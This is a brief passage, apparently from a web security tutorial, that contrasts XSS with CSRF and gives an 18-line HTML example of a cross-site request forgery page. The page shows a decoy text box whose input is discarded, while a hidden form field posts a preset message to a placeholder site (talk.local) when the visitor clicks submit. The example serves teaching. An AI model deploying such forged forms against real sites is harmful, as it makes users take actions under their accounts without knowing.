XSS is a popular, and well-known vulnerability. CSRF is less common but just as dangerous, particularly because of the lack of awareness.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<!doctype html>
<head>
<title>Feels</title>
</head>
<body>
<h1>How are you?</h1>
<input type="textarea" />
<!--
notice how this text area is not a child of the form below.
we don't care about the user's input, it is discarded.
-->
<form action="http://talk.local/create_story">
<input type="hidden" name="my_story" value="i feel very small, please hold me closer..." />
<input type="submit" />
</form>
</body>